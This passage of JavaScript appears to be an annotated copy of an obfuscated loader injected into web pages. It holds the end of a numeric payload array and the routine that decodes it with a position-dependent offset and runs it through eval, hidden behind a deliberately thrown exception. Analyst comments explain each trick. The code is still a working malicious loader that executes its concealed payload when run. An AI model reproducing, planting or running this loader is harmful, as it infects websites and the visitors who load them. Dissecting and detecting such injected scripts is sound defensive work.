37, 40, 103, 113, 95, 37, 54, 47, 46, 41, 49, 47, 46, 45, 41, 42, 37, 109, 120, 58, 30, 122, 60, 46, 113, 113, 121, 107, 99, 59, 32, 59, 98, 102, 118, 31, 97, 105, 97, 114, 113, 58, 34, 114, 37, 40, 115, 115, 108, 106, 43, 38, 32, 59, 60, 104, 100, 111, 97, 108, 99, 29, 115, 113, 97, 58, 34, 103, 114, 113, 112, 57, 45, 44, 112, 116, 106, 105, 100, 110, 117, 107, 108, 96, 119, 112, 46, 104, 108, 99, 111, 46, 95, 97, 47, 101, 99, 98, 100, 45, 110, 101, 112, 33, 30, 116, 105, 99, 114, 101, 61, 33, 37, 40, 103, 113, 95, 37, 51, 47, 46, 41, 54, 47, 46, 38, 43, 38, 32, 29, 104, 100, 103, 100, 104, 115, 59, 31, 39, 42, 101, 111, 97, 39, 49, 45, 48, 43, 52, 45, 48, 40, 41, 36, 34, 61, 58, 44, 105, 101, 112, 94, 109, 100, 60, 57, 47, 99, 103, 115, 62, 38, 39, 56, 13, 9, 7, 122, 13, 9, 7, 115, 97, 113, 30, 98, 120, 111, 59, 107, 101, 118, 30, 65, 97, 115, 99, 37, 41, 58, 99, 117, 112, 45, 113, 98, 116, 67, 95, 113, 101, 39, 99, 117, 112, 45, 101, 98, 116, 67, 95, 113, 101, 39, 39, 40, 55, 40, 57, 10, 10, 8, 103, 99, 40, 99, 109, 96, 117, 108, 99, 107, 116, 45, 97, 108, 111, 106, 103, 98, 46, 104, 108, 97, 101, 119, 77, 99, 40, 38, 93, 92, 117, 115, 107, 99, 114, 60, 37, 38, 61, 60, 43, 46, 41, 122, 98, 108, 99, 116, 107, 98, 110, 115, 44, 96, 111, 110, 105, 102, 101, 60, 37, 92, 95, 116, 114, 106, 102, 113, 59, 36, 43, 113, 113, 37, 41, 42, 37, 56, 32, 100, 118, 109, 105, 113, 99, 112, 61, 38, 41, 98, 120, 111, 44, 113, 111, 70, 75, 81, 83, 115, 112, 102, 110, 102, 38, 38, 43, 38, 57, 29, 112, 96, 114, 101, 61, 46, 37, 56, 125, 12, 8, 122);
}
// Formatted copy of the injected loader, last part: decode and execute.
// w now refers to the numeric array f assigned in the statement above.
w = f;
// s starts as an empty array; the first `s + string` turns it into a string.
s = [];
// Runs for i = 0 .. 799 (the condition is just i != 800 written differently).
for (i = 0; - i + 800 != 0; i += 1) {
j = i;
// 031 is octal for 25, the same as 0x19, so the first test is always true.
// e("j%4") evaluates j % 4 through eval; that value (0, 1, 2, 3, repeating)
// is added to the stored number before it is turned into a character.
if ((031 == 0x19)) if (e) s = s + String.fromCharCode((1 * w[j] + e("j%4")));
}
xz = e;
// The decoded string is passed to eval from the catch branch, so it runs only
// when `document.body++` throws.
// For analysis, the decoded text can be printed at this point instead of being
// passed to xz, which shows the payload without running it.
try {
document.body++
} catch (gdsgd) {
xz(s)
}
